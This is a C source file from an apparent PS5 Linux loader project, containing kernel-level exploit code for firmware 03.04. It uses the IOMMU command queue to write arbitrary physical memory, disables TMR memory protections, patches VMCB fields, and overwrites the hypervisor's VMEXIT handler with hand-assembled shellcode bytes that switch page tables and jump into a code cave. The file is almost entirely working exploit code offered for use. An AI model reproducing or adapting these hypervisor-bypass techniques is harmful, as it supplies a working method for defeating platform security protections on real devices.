Files
ps5-linux-loader/shellcode_kernel/exploit_0304.c
2026-05-13 16:31:10 +02:00

154 lines
5.6 KiB
C

#include "exploit_0304.h"
#include "../include/config.h"
#include "shellcode_kernel_args.h"
#include "utils.h"
uint32_t (*hv_iommu_set_buffers)(uint64_t cb2_pa, uint64_t cb3_pa,
uint64_t eb_pa, uint64_t unk, int *n_devices);
uint32_t (*hv_iommu_wait_completion)(void);
int disable_npts_0304(volatile shellcode_kernel_args *args_ptr) {
uint64_t iommu_cb2_pa = vtophys(args_ptr->dmap_base, args_ptr->iommu_cb2_va);
uint64_t iommu_cb3_pa = vtophys(args_ptr->dmap_base, args_ptr->iommu_cb3_va);
uint64_t iommu_eb_pa = vtophys(args_ptr->dmap_base, args_ptr->iommu_eb_va);
uint64_t unk;
int n_devices;
// Reconfigure IOMMU calling the HV
int ret = ((uint64_t(*)(uint64_t, uint64_t, uint64_t, uint64_t,
int *))args_ptr->fun_hv_iommu_set_buffers)(
iommu_cb2_pa, iommu_cb3_pa, iommu_eb_pa, (uint64_t)&unk, &n_devices);
if (ret != 0) {
puts_uart(args_ptr->dmap_base, (char[]){"IOMMU sb X\n"});
return -1;
}
ret = ((uint64_t(*)(void))args_ptr->fun_hv_iommu_wait_completion)();
if (ret) {
puts_uart(args_ptr->dmap_base, (char[]){"IOMMU sb NO OK\n"});
return -1;
}
puts_uart(args_ptr->dmap_base, (char[]){"IOMMU sb OK\n"});
if (tmr_disable(args_ptr->dmap_base)) {
puts_uart(args_ptr->dmap_base, (char[]){"TMR NO OK\n"});
return -1;
}
puts_uart(args_ptr->dmap_base, (char[]){"TMR OK\n"});
patch_vmcb(args_ptr);
puts_uart(args_ptr->dmap_base, (char[]){"VMCB OK\n"});
// Re-do this to force a VMEXIT without HV injecting faults
((uint64_t(*)(uint64_t, uint64_t, uint64_t, uint64_t,
int *))args_ptr->fun_hv_iommu_set_buffers)(
iommu_cb2_pa, iommu_cb3_pa, iommu_eb_pa, (uint64_t)&unk, &n_devices);
((uint64_t(*)(void))args_ptr->fun_hv_iommu_wait_completion)();
puts_uart(args_ptr->dmap_base, (char[]){"Back from HV\n"});
return 0;
}
void patch_hv_0304(void) {
// Jump to shellcode final identity mapping
uint8_t shellcode_jmp[] = {
0x48, 0xC7, 0xC0, 0x00, 0x6F, 0x80, 0x62, // mov rax, 0x62806f00
0xFF, 0xE0, 0xC3, 0xC3, 0xC3, 0xC3, 0xC3, // jmp rax
0xC3, 0xC3};
// Update code cave in hv 1:1 region
*(uint32_t *)(&shellcode_jmp[3]) = (uint32_t)args.hv_code_cave_pa;
// Just patch the VMEXIT handler directly, avoiding all checks
memcpy((void *)PHYS_TO_DMAP(args.hv_handle_vmexit_pa), shellcode_jmp,
sizeof(shellcode_jmp));
uint8_t shellcode_identity_and_jmp[] = {
0x48, 0xB8, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, // movabs rax, 0x100000000
0x0F, 0x22, 0xD8, // mov cr3, rax
0x48, 0xB8, 0x00, 0x30, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, // movabs rax, 0x100003000
0xFF, 0xE0 // jmp rax
};
// Update CR3 PA (from config)
*(uint64_t *)(&shellcode_identity_and_jmp[2]) = cave_hv_paging;
// Update HV shellcode cave
*(uint64_t *)(&shellcode_identity_and_jmp[15]) = cave_hv_code;
// Install shellcode to update CR3 and jump to main HV shellcode
memcpy((void *)PHYS_TO_DMAP(args.hv_code_cave_pa), shellcode_identity_and_jmp,
sizeof(shellcode_identity_and_jmp));
}
__attribute__((noinline, optimize("O0"))) void
iommu_submit_cmd(volatile shellcode_kernel_args *args_ptr, uint64_t *cmd) {
uint64_t curr_tail =
*((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8);
uint64_t next_tail = (curr_tail + IOMMU_CMD_ENTRY_SIZE) & IOMMU_CB_MASK;
uint64_t *cmd_buffer = (uint64_t *)args_ptr->iommu_cb2_va + curr_tail / 8;
cmd_buffer[0] = cmd[0];
cmd_buffer[1] = cmd[1];
__asm__ volatile("" : : : "memory");
*((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8) = next_tail;
while (*((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_HEAD / 8) !=
*((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8))
;
}
__attribute__((noinline, optimize("O0"))) void
iommu_write8_pa(volatile shellcode_kernel_args *args_ptr, uint64_t pa,
uint64_t val) {
uint32_t cmd[4] = {0};
cmd[0] = (uint32_t)(pa & 0xFFFFFFF8) | 0x05;
cmd[1] = ((uint32_t)(pa >> 32) & 0xFFFFF) | 0x10000000;
cmd[2] = (uint32_t)(val);
cmd[3] = (uint32_t)(val >> 32);
iommu_submit_cmd(args_ptr, (uint64_t *)cmd);
}
__attribute__((noinline, optimize("O0"))) void
patch_vmcb(volatile shellcode_kernel_args *args_ptr) {
for (int i = 0; i < 16; i++) {
uint64_t pa = args_ptr->vmcb[i];
iommu_write8_pa(args_ptr, pa + 0x00, 0x0000000000000000ULL);
iommu_write8_pa(args_ptr, pa + 0x08, 0x0004000000000000ULL);
iommu_write8_pa(args_ptr, pa + 0x10, 0x000000000000000FULL);
iommu_write8_pa(args_ptr, pa + 0x58, 0x0000000000000001ULL);
iommu_write8_pa(args_ptr, pa + 0x90, 0x0000000000000000ULL);
}
}
__attribute__((noinline, optimize("O0"))) uint32_t tmr_read(uint64_t dmap,
uint32_t addr) {
*(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_INDEX_OFF) = addr;
return *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_DATA_OFF);
}
__attribute__((noinline, optimize("O0"))) void
tmr_write(uint64_t dmap, uint32_t addr, uint32_t val) {
*(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_INDEX_OFF) = addr;
*(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_DATA_OFF) = val;
}
__attribute__((noinline, optimize("O0"))) int tmr_disable(uint64_t dmap) {
for (int i = 0; i < 24; i++) {
if (tmr_read(dmap, TMR_CONFIG(i)) != 0) {
tmr_write(dmap, TMR_CONFIG(i), 0);
if (tmr_read(dmap, TMR_CONFIG(i)) != 0) {
return -1;
}
}
}
return 0;
}